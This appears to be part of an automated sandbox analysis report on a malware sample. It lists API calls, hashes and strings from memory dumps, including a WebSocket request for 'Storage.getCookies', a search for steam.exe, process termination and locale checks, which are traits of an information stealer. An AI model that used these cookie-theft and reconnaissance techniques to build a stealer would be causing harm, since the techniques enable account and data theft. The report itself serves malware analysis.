                            • Opcode Fuzzy Hash: 74aff4e8caaab226bca8c2f88ae61749c0d19a399187a5d2c3083d1c390f6f85
                            • Instruction Fuzzy Hash: 406142719102199BCB24EF74DC88ADEBBF8EF48300F4045E5E549D7291DB34AA49CFA0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_
                            • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                            • API String ID: 909987262-758292691
                            • Opcode ID: c818c79754feed5baad0156d5068210e5e540bbdbc24454f774d4452d2a4e699
                            • Instruction ID: d8f84b8e5af4eb47cdc849bdc16c1abf4ac06e00eb1fb2c662f6d5f1633c8c7c
                            • Opcode Fuzzy Hash: c818c79754feed5baad0156d5068210e5e540bbdbc24454f774d4452d2a4e699
                            • Instruction Fuzzy Hash: ACA23771D012699FDB20DBA8D8807EDBBF6AF48300F1485EAE519A7281DB715F85CF90
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B123D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B123F7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B12402
                            • lstrlen.KERNEL32(\*.*), ref: 00B1240D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1242A
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 00B12436
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1246A
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00B12486
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: \*.*
                            • API String ID: 2567437900-1173974218
                            • Opcode ID: 0e3bf505c66f49a510668b91da164f592b8a86298c601197e05ff530fe545059
                            • Instruction ID: 9926a7f46f2e78680834b7c9bc739050f2c483afa56e5b7d199f8494bd21a7fc
                            • Opcode Fuzzy Hash: 0e3bf505c66f49a510668b91da164f592b8a86298c601197e05ff530fe545059
                            • Instruction Fuzzy Hash: 3D414C316116198BCB22EF28ED89ADE7BE4AF54300F4451B4B95A972A1CF70DC498BA0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: %6u{$0=w$35w]$9;?$=;?$@*0$Qp{~$`f,@$cxf~$ql?
                            • API String ID: 0-1274174781
                            • Opcode ID: b3489c583fdbf10a65a24de709aaaf7ba545c474e672c18ca16411a809165e89
                            • Instruction ID: bcfb423c68bddbcbbe273367d48317c60cbe0da20193a1cc2b6d3bc123a090e3
                            • Opcode Fuzzy Hash: b3489c583fdbf10a65a24de709aaaf7ba545c474e672c18ca16411a809165e89
                            • Instruction Fuzzy Hash: 48B215F3A0C2009FE3046F29EC8567ABBE5EF94720F1A493DEAC5C3744EA7558418697
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00B246B9
                            • Process32First.KERNEL32(00000000,00000128), ref: 00B246C9
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00B246DB
                            • StrCmpCA.SHLWAPI(?,?), ref: 00B246ED
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B24702
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B24711
                            • CloseHandle.KERNEL32(00000000), ref: 00B24718
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00B24726
                            • CloseHandle.KERNEL32(00000000), ref: 00B24731
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 3836391474-0
                            • Opcode ID: a473a462ec6167eb7a7334a86afecb26b4dd301d366375ed35e296a2fda2372d
                            • Instruction ID: 7377b4fcfea130736d1e4f073a9e6880715b01cda506ea7cc09d7e6c98abaee3
                            • Opcode Fuzzy Hash: a473a462ec6167eb7a7334a86afecb26b4dd301d366375ed35e296a2fda2372d
                            • Instruction Fuzzy Hash: ED016D31601324ABE7215B60AC89FFA77BCEF49B51F000198F909D6290EFB49D859A71
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: C;=$'mW$*<w$43}$7%$Ac?$To9/$v!];$1om
                            • API String ID: 0-2360086392
                            • Opcode ID: 8d12f07d334b299434942667e15158e1256fc0e6925c7a9237ee18bb60b253a4
                            • Instruction ID: 138e0f59d38c1400a646be253ff73cf1e31821d308418cf715ddb3c585a5b6aa
                            • Opcode Fuzzy Hash: 8d12f07d334b299434942667e15158e1256fc0e6925c7a9237ee18bb60b253a4
                            • Instruction Fuzzy Hash: 9EB2B4F360C200AFE305AE29EC4567ABBE5EFD4320F16893DE6C4C7744EA3598458697
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: #_$,Jzz$>|%$@t~$].xo$].xo$m][~$hi$;x
                            • API String ID: 0-2755435236
                            • Opcode ID: dfc352536ca92c115503c09da4d97d4c06497017100ee38a6c79d56d0661208a
                            • Instruction ID: c073187e4d327d895a8bedbab4a7f46e78378cc414b788ad2419a32dc8b7c108
                            • Opcode Fuzzy Hash: dfc352536ca92c115503c09da4d97d4c06497017100ee38a6c79d56d0661208a
                            • Instruction Fuzzy Hash: E69205F3A0C2049FE704AE2DEC8567AFBE5EF94320F16493DEAC583744E63558058697
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00B24628
                            • Process32First.KERNEL32(00000000,00000128), ref: 00B24638
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00B2464A
                            • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00B24660
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00B24672
                            • CloseHandle.KERNEL32(00000000), ref: 00B2467D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                            • String ID: steam.exe
                            • API String ID: 2284531361-2826358650
                            • Opcode ID: 077afa0ceee976f6ef645c28b24b8996a712436bc0bd0e94aba4a7cb3d143169
                            • Instruction ID: 652ac8f46896ef19b6e49080f1e4a36d83357bdef40866d880ff43fe4bf7e04a
                            • Opcode Fuzzy Hash: 077afa0ceee976f6ef645c28b24b8996a712436bc0bd0e94aba4a7cb3d143169
                            • Instruction Fuzzy Hash: 330162716012249BE7219B60AC89FEA77BCEF09750F0401D5F909D1140EFB499948BE5
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B14B51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B14B74
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B14B7F
                            • lstrlen.KERNEL32(00B34CA8), ref: 00B14B8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B14BA7
                            • lstrcat.KERNEL32(00000000,00B34CA8), ref: 00B14BB3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B14BDE
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00B14BFA
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID:
                            • API String ID: 2567437900-0
                            • Opcode ID: 3c16b390c7032618ac77fd45ea6ea7f06baa5f38d16bde862c79f95f77930be0
                            • Instruction ID: b5e8efaddca9684d66a0e8ad36ee5b6ee5c6652f6662f358c42bd6b855a35f07
                            • Opcode Fuzzy Hash: 3c16b390c7032618ac77fd45ea6ea7f06baa5f38d16bde862c79f95f77930be0
                            • Instruction Fuzzy Hash: 383130316256159BC722EF68ED89A9F7BF5EF54700F5011B4F80597291CF70DC498BA0
                            APIs
                              • Part of subcall function 00B271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00B271FE
                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00B22D9B
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00B22DAD
                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00B22DBA
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00B22DEC
                            • LocalFree.KERNEL32(00000000), ref: 00B22FCA
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: 63a16e74b143614ed69a6e8d1c58927d9e2f66eff8b960ab73ad1c4b1f78908e
                            • Instruction ID: dda5c9748e816670a521c87c5b38fcd8815af18df21f189bf02f6995f2f9a55f
                            • Opcode Fuzzy Hash: 63a16e74b143614ed69a6e8d1c58927d9e2f66eff8b960ab73ad1c4b1f78908e
                            • Instruction Fuzzy Hash: 5EB1C271900224DFC715CF18E988B99B7F1FB44324F2AC1A9D40DAB2A6D7769D82DF90
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 1+dq$1{$:o$FsY$ZSU$\dl:$n|l}
                            • API String ID: 0-1456053596
                            • Opcode ID: fc70a3be453153a6b637535e6e7d73e842cabe6f097791fba38013de07eca28b
                            • Instruction ID: 988bf4d8481d146707643d81a37fed3c024907c94b8481fe411a3ef5f3894e65
                            • Opcode Fuzzy Hash: fc70a3be453153a6b637535e6e7d73e842cabe6f097791fba38013de07eca28b
                            • Instruction Fuzzy Hash: 8BB228F360C2049FE3086E2DEC8567AFBE9EF94320F1A493DEAC5C7744E63558418696
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
